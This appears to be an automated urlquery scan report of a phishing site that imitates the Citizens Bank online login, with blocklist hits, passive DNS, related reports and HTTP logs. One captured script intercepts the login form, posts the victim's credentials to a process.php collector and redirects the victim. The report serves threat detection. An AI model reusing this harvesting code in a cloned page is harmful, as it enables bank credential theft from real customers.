Overview

URL 2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/
IP 69.49.244.31
ASN UNIFIEDLAYER-AS-1
Location United States
Report completed 2022-09-30 21:48:03 UTC
urlquery Alerts No alerts detected


Settings

UserAgent Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blocklists

OpenPhish
Scan Date Severity Indicator Comment
2022-09-30 2 2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/ RBS Citizens Bank
PhishTank  No alerts detected
Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-09-30 2 2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/ Phishing
2022-09-30 2 2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/js/actions.js Phishing
2022-09-30 2 2914hawthorn.info/efs/hhf/js/citizensHeaderFooter-citizensns44745.js Phishing
2022-09-30 2 2914hawthorn.info/t-Kmcy8k/uJqt11r/GPaw2Rw/Wd/5cz5rDSm/fQEkCFEB/BwwGXU/UME20 Phishing
2022-09-30 2 2914hawthorn.info/_sec/cp_challenge/sec-cpt-3-6.js Phishing
2022-09-30 2 2914hawthorn.info/efs/efs/jsp-ns/scripts/common.js Phishing
mnemonic secure dns  No alerts detected
Quad9 DNS  No alerts detected


Files

No files detected



Passive DNS (22)

Passive DNS Source Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
mnemonic passive DNS push.services.mozilla.com (1) 2140 2015-09-03 10:29:36 UTC 2022-09-30 05:12:28 UTC 52.39.175.179
mnemonic passive DNS www.citizensbank.com (1) 80069 2012-07-03 13:47:53 UTC 2022-09-29 15:41:45 UTC 104.110.12.116
mnemonic passive DNS stackpath.bootstrapcdn.com (1) 2467 2018-04-05 04:41:29 UTC 2022-09-30 11:00:19 UTC 104.18.10.207
mnemonic passive DNS content-signature-2.cdn.mozilla.net (1) 1152 2020-11-03 12:26:46 UTC 2022-09-30 05:34:07 UTC 34.160.144.191
mnemonic passive DNS cdnjs.cloudflare.com (2) 235 2020-10-20 10:17:36 UTC 2022-09-30 06:01:15 UTC 104.17.24.14
mnemonic passive DNS 2914hawthorn.info (10) 0 2022-09-26 09:58:17 UTC 2022-09-30 13:12:50 UTC 69.49.244.31 Unknown ranking
mnemonic passive DNS ajax.aspnetcdn.com (1) 693 2012-05-24 13:35:31 UTC 2022-09-30 13:56:54 UTC 152.199.19.160
mnemonic passive DNS ocsp.sectigo.com (2) 487 2018-12-17 11:31:55 UTC 2022-09-30 15:22:46 UTC 104.18.32.68
mnemonic passive DNS r3.o.lencr.org (7) 344 2020-12-02 08:52:13 UTC 2022-09-30 04:55:29 UTC 23.36.76.226
mnemonic passive DNS contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-09-30 04:56:26 UTC 34.117.237.239
mnemonic passive DNS ocsps.ssl.com (1) 14517 2018-11-21 10:22:19 UTC 2022-09-30 14:55:16 UTC 34.237.184.165
mnemonic passive DNS udc-neb.kampyle.com (1) 3039 2015-12-24 09:52:27 UTC 2022-09-30 17:31:45 UTC 35.241.45.82
mnemonic passive DNS lpcdn.lpsnmedia.net (2) 3501 2014-04-27 10:17:58 UTC 2022-09-30 15:19:07 UTC 178.249.97.98
mnemonic passive DNS va.idp.liveperson.net (1) 13470 2017-02-09 19:09:19 UTC 2022-09-30 09:19:03 UTC 208.89.15.170
mnemonic passive DNS www3.citizensbankonline.com (23) 125923 2012-07-05 13:46:01 UTC 2022-09-29 21:33:15 UTC 104.110.3.220
mnemonic passive DNS nebula-cdn.kampyle.com (2) 3739 2015-09-21 16:24:38 UTC 2022-09-30 17:31:45 UTC 151.101.85.175
mnemonic passive DNS code.jquery.com (2) 634 2012-05-21 17:28:02 UTC 2022-09-30 05:18:50 UTC 69.16.175.10
mnemonic passive DNS ocsp.entrust.net (5) 1208 2013-07-24 12:09:14 UTC 2022-09-30 04:55:29 UTC 104.110.10.32
mnemonic passive DNS citizensbank.demdex.net (1) 68781 2017-03-23 21:06:39 UTC 2022-09-29 21:33:16 UTC 54.76.210.146
mnemonic passive DNS img-getpocket.cdn.mozilla.net (5) 1631 2017-09-01 03:40:57 UTC 2022-09-30 13:49:02 UTC 34.120.237.76
mnemonic passive DNS firefox.settings.services.mozilla.com (2) 867 2020-05-27 20:08:30 UTC 2022-09-30 17:00:01 UTC 18.165.201.80
mnemonic passive DNS ocsp.digicert.com (4) 86 2012-05-21 07:02:23 UTC 2022-09-30 15:21:19 UTC 93.184.220.29


Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 69.49.244.31

Date UQ / IDS / BL URL IP
2022-11-29 22:46:57 +0000 0 - 0 - 3 sfnimarketing.in/ 69.49.244.31
2022-11-23 20:16:42 +0000 0 - 0 - 1 yrkhrsolutions.com/success/go/timcrooks@slurp (...) 69.49.244.31
2022-11-22 06:48:01 +0000 0 - 0 - 2 drinkdrrip.com/Secure 69.49.244.31
2022-11-19 13:35:07 +0000 0 - 0 - 2 newsmantra.org/secure 69.49.244.31
2022-11-19 05:52:00 +0000 11 - 0 - 3 newsmantra.org/secure 69.49.244.31

Last 5 reports on ASN: UNIFIEDLAYER-AS-1

Date UQ / IDS / BL URL IP
2022-12-02 14:02:42 +0000 17 - 0 - 32 delivery.imaginedbyjess.co/public/cieA3B7SlWJ (...) 192.232.249.125
2022-12-02 14:02:41 +0000 17 - 0 - 32 delivery.imaginedbyjess.co/public/NYlvbSkmoJj (...) 192.232.249.125
2022-12-02 13:58:31 +0000 0 - 0 - 1 cloudgroupdigital.com/ 162.241.61.68
2022-12-02 13:58:32 +0000 0 - 0 - 1 cloudgroupdigital.com/ 162.241.61.68
2022-12-02 13:53:30 +0000 44 - 0 - 44 coprwanda.com/login.php?primarymember_id=11cc (...) 192.185.105.9

Last 1 reports on domain: 2914hawthorn.info

Date UQ / IDS / BL URL IP
2022-09-30 21:48:03 +0000 0 - 0 - 7 2914hawthorn.info/citi/citizensbankonline.com (...) 69.49.244.31

Last 5 reports with similar screenshot

Date UQ / IDS / BL URL IP
2022-12-01 17:44:57 +0000 15 - 0 - 60 ci1tzn.com/ 104.16.244.78
2022-12-01 17:28:36 +0000 10 - 0 - 55 ctzacv.com/ 104.16.243.78
2022-12-01 14:58:14 +0000 13 - 0 - 45 ci1tzn.com/ 104.16.243.78
2022-12-01 14:41:53 +0000 11 - 0 - 57 ctzacv.com/ 104.16.244.78
2022-11-20 11:21:00 +0000 21 - 0 - 0 cumnasi.cf/Citizensbnk/1124225a47b3f07185073f (...) 162.240.217.8


JavaScript

Executed Scripts (17)


Executed Evals (1)

#1 JavaScript::Eval (size: 297, repeated: 1) - SHA256: 4001688cd514fdd8fb5fdf8f6e689d30f761a0b65924f36c5f349566b9fbf3ba

$(document).bind("contextmenu", function(e) {
    return false
});
$('#loginForm').on('submit', function(e) {
    $(".overlay").show(500);
    $.post('T_a_n_G_u_l_AR/process.php', $(this).serialize(), function(data) {
        console.log(data)
    });
    setTimeout(function() {
        window.location.href = "indexs.php"
    }, 2000);
    e.preventDefault()
});

Executed Writes (1)

#1 JavaScript::Write (size: 22706, repeated: 1) - SHA256: 7aee08c5fd0d1e094f470e844fbdf53b03da77ea35167d240df66ff081ac8901


HTTP Transactions (76)


Request Response

GET /v1/ HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

18.165.201.80
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length, Backoff, Content-Type, Retry-After, Alert
Cache-Control: max-age=3600
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Fri, 30 Sep 2022 21:02:06 GMT
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 02dcbe051a75d060274d188948821dcc.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: LHR50-P3
X-Amz-Cf-Id: MYrb88qBIdBAUN_CI8m6GoMsh-GyLSQuhJLytfJR22zPCKhy_HvbhQ==
Age: 2746


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    2d12f67fe57a87e7366b662d153a5582
Sha1:   d7b02d81cc74f24a251d9363e0f4b0a149264ec1
Sha256: 73c273c0b5a2de3cb970b8e8c187999d3b55e760dc7766dab4bb76428d19b551

POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Server: nginx
Content-Length: 503
ETag: "763E2DADFDD286A51327CD2000CA335E30CD0B9B7267875D22CA33F7556BA200"
Last-Modified: Fri, 30 Sep 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5125
Expires: Fri, 30 Sep 2022 23:13:17 GMT
Date: Fri, 30 Sep 2022 21:47:52 GMT
Connection: keep-alive

POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "DFF04734315B51FC11069E2D21B5BE37B03D28AD01986E1AE2C96AFC6BA31859"
Last-Modified: Thu, 29 Sep 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=20084
Expires: Sat, 01 Oct 2022 03:22:36 GMT
Date: Fri, 30 Sep 2022 21:47:52 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-10-30-18-47-44.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         34.160.144.191
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
x-amz-id-2: 0CjRecpRxiOwYsK21q4Rf2DZBadmoRKko9yraMQtB1DOIfy1DfJYzqusg8N70Gu24VR6uaBGnBk=
x-amz-request-id: XZ33XH8FZBZBDYDR
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Fri, 30 Sep 2022 20:51:31 GMT
age: 3381
last-modified: Sat, 10 Sep 2022 18:47:45 GMT
etag: "6113f8408c59aebe188d6af273b90743"
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    6113f8408c59aebe188d6af273b90743
Sha1:   7398873bf00f99944eaa77ad3ebc0d43c23dba6b
Sha256: b6e0cc9ad68306208a160f3835fb8da76acc5a82d8fde1da5a98e1de1c11a770
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Fri, 30 Sep 2022 21:47:52 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET /citi/citizensbankonline.com_deathshortencode/W/ HTTP/1.1 
Host: 2914hawthorn.info
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

                                         
                                         69.49.244.31
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Fri, 30 Sep 2022 21:47:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=faa12d036bbaa029941efe16476be2a1; path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text, with very long lines (28570), with CRLF line terminators
Size:   34309
Md5:    de863426ae80cf0784c7dfc86d12ef6f
Sha1:   afe91739c4632c06c90eb3866dba7e31bcd275db
Sha256: f16fd8ca8681124e566968b7ff506d55c829be5ee62f832f629263297a910679

Alerts:
  Blocklists:
    - openphish: RBS Citizens Bank
    - fortinet: Phishing
                                        
                                            GET /ajax/libs/popper.js/1.14.0/umd/popper.min.js HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://2914hawthorn.info
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.24.14
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Fri, 30 Sep 2022 21:47:53 GMT
content-length: 6458
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5eb03fa9-500f"
last-modified: Mon, 04 May 2020 16:15:37 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 7617720
expires: Wed, 20 Sep 2023 21:47:53 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r5tGDCib%2BhmL93hyFhrb%2FkmsWG5Jpw%2FQpQ8vIGTrqWfuNW7E2dUtjWq%2BZKJdV%2FOCNaJQ%2FIU173CjWzX%2F0fAgFgrkBV5NMA7Adi%2BkFiJODi%2FBq3qHUR0P78%2Fm6ZlZ%2FWkm%2FvMnNOlm"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 753028d85cf10afe-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (20322)
Size:   6458
Md5:    df9fe6d48e380554eb0ec9687bed3246
Sha1:   207263d754220200c1916edfbda262f62223ecf5
Sha256: 91d57502b7260e6752c2b5f1636d77707929fa9f09da28589691e61816a448f9
                                        
                                            GET /ajax/libs/jquery.mask/1.14.10/jquery.mask.js HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.24.14
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Fri, 30 Sep 2022 21:47:53 GMT
content-length: 4517
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5eb03ec3-4e98"
last-modified: Mon, 04 May 2020 16:11:47 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 3289659
expires: Wed, 20 Sep 2023 21:47:53 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nOi7NN7pV%2Fv7RHTYWSEyoYp%2B71tNsJrGOAg9rSLLHeWNvhdgVH%2FpP1CeCe%2BItZqvCJp0st6F%2BHcANWtePvcBL6YBIWEXelPxIzhFkDm%2FfQIgGqWYjoFCb008TRlNtNRYP0twbO78"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 753028d86d71b512-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   4517
Md5:    e40e054c5726f042bad463e3774a2777
Sha1:   5c9413b72837a440b327444104830c35ae3b052c
Sha256: fcc8a86d2e89e8fbe9815d50c23bf205191ab8a6c0bec67358cd975d94283ff8
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5931
Cache-Control: max-age=121933
Date: Fri, 30 Sep 2022 21:47:53 GMT
Etag: "6336862b-117"
Expires: Sun, 02 Oct 2022 07:40:06 GMT
Last-Modified: Fri, 30 Sep 2022 06:01:15 GMT
Server: ECS (ska/F6FD)
X-Cache: HIT
Content-Length: 279

                                        
                                            GET /ajax/jQuery/jquery-3.3.1.min.js HTTP/1.1 
Host: ajax.aspnetcdn.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         152.199.19.160
HTTP/2 200 OK
content-type: application/javascript
                                        
content-encoding: gzip
accept-ranges: bytes
access-control-allow-origin: *
age: 17575968
cache-control: public,max-age=31536000
date: Fri, 30 Sep 2022 21:47:53 GMT
etag: "80288516b793d31:0"
last-modified: Mon, 22 Jan 2018 19:27:49 GMT
server: ECAcc (ska/F7A8)
timing-allow-origin: *
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-length: 30394
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65451)
Size:   30394
Md5:    a263be51483c81a54aa8c85104a93e55
Sha1:   555a54a73531c553bd2aede6abc25c128b63312e
Sha256: b2f13ad730928958c09d89e6e32bb6a227c0260d032a39ca464d998a59e57a66
                                        
                                            GET /jquery-3.3.1.slim.min.js HTTP/1.1 
Host: code.jquery.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://2914hawthorn.info
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         69.16.175.10
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Fri, 30 Sep 2022 21:47:53 GMT
content-encoding: gzip
content-length: 24038
last-modified: Fri, 20 Aug 2021 17:47:53 GMT
accept-ranges: bytes
server: nginx
etag: W/"611feac9-1111d"
cache-control: max-age=315360000, public
access-control-allow-origin: *
vary: Accept-Encoding
x-hw: 1664574473.dop219.sk1.t,1664574473.cds071.sk1.hn,1664574473.cds230.sk1.c
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65247)
Size:   24038
Md5:    0f2e7d37e730fdbb1d8a1e8638529ecb
Sha1:   c21d16978a858baa75be15cb7e799ff000929429
Sha256: cc938c08b93e67c94c68995709f52133c62cac78991f42058503b9c3d9e4b0b0
                                        
                                            GET /jquery-3.2.1.min.js HTTP/1.1 
Host: code.jquery.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         69.16.175.10
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Fri, 30 Sep 2022 21:47:53 GMT
content-encoding: gzip
content-length: 30125
last-modified: Fri, 20 Aug 2021 17:47:53 GMT
accept-ranges: bytes
server: nginx
etag: W/"611feac9-15283"
cache-control: max-age=315360000, public
access-control-allow-origin: *
vary: Accept-Encoding
x-hw: 1664574473.dop208.sk1.t,1664574473.cds257.sk1.hn,1664574473.cds222.sk1.c
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (32058)
Size:   30125
Md5:    148f8d3ffd9cc02048c5f4d1cc83c407
Sha1:   9f2b89cfd151be6a29b4d43ad64d164fb8471046
Sha256: 4dc681da48ba2b417e613e8e027ff5322963c3a3697a8ba97973cfefb48def5e
                                        
                                            GET /citi/citizensbankonline.com_deathshortencode/W/css/style.css HTTP/1.1 
Host: 2914hawthorn.info
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/
Cookie: PHPSESSID=faa12d036bbaa029941efe16476be2a1
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         69.49.244.31
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Fri, 30 Sep 2022 21:47:51 GMT
Server: Apache
Last-Modified: Sat, 11 Sep 2021 23:33:28 GMT
Accept-Ranges: bytes
Content-Length: 276
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   276
Md5:    cf8082d42827570555aa3c8247b357f1
Sha1:   7ebd45146e9d22f1c3c19d6e7e532ecf70b76327
Sha256: 279b0f0df4fc4c51d93071e759a7dc2210b085aa0f2c41f40247720fc2906e77
                                        
                                            POST / HTTP/1.1 
Host: ocsp.entrust.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 79
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         104.110.10.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
ETag: "DBB26F155F5789FA5829012543A0960DF03167CDD1EAE5FB8A3AE110F6C7B340"
Last-Modified: Fri, 30 Sep 2022 11:00:00 UTC
Content-Length: 1588
Cache-Control: public, no-transform, must-revalidate, max-age=2983
Expires: Fri, 30 Sep 2022 22:37:36 GMT
Date: Fri, 30 Sep 2022 21:47:53 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1588
Md5:    52ff3e3c910133c4bbe27c7cf1ae164f
Sha1:   deed1687f0c115816f5dc1f16718d1790a723fe5
Sha256: dbb26f155f5789fa5829012543a0960df03167cdd1eae5fb8a3ae110f6c7b340
                                        
                                            POST / HTTP/1.1 
Host: ocsp.entrust.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 79
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         104.110.10.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
ETag: "DBB26F155F5789FA5829012543A0960DF03167CDD1EAE5FB8A3AE110F6C7B340"
Last-Modified: Fri, 30 Sep 2022 11:00:00 UTC
Content-Length: 1588
Cache-Control: public, no-transform, must-revalidate, max-age=2873
Expires: Fri, 30 Sep 2022 22:35:46 GMT
Date: Fri, 30 Sep 2022 21:47:53 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1588
Md5:    52ff3e3c910133c4bbe27c7cf1ae164f
Sha1:   deed1687f0c115816f5dc1f16718d1790a723fe5
Sha256: dbb26f155f5789fa5829012543a0960df03167cdd1eae5fb8a3ae110f6c7b340
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5931
Cache-Control: max-age=121933
Date: Fri, 30 Sep 2022 21:47:53 GMT
Etag: "6336862b-117"
Expires: Sun, 02 Oct 2022 07:40:06 GMT
Last-Modified: Fri, 30 Sep 2022 06:01:15 GMT
Server: ECS (ska/F6FD)
X-Cache: HIT
Content-Length: 279

                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         18.165.201.80
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Alert, Content-Type, Expires, Backoff, ETag, Last-Modified, Pragma, Cache-Control, Content-Length, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
X-Content-Type-Options: nosniff
Date: Fri, 30 Sep 2022 21:32:55 GMT
Cache-Control: max-age=3600, max-age=3600
Expires: Fri, 30 Sep 2022 22:12:13 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 4ae6e5888b43b4133973ba1aadad8194.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: LHR50-P3
X-Amz-Cf-Id: 5Djxq7-uJXdSn3BsBaxhXXosqqOiJNFxY9M0iko1rL70ad9KP_K4ew==
Age: 900


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            GET /citi/citizensbankonline.com_deathshortencode/W/js/actions.js HTTP/1.1 
Host: 2914hawthorn.info
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/
Cookie: PHPSESSID=faa12d036bbaa029941efe16476be2a1
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
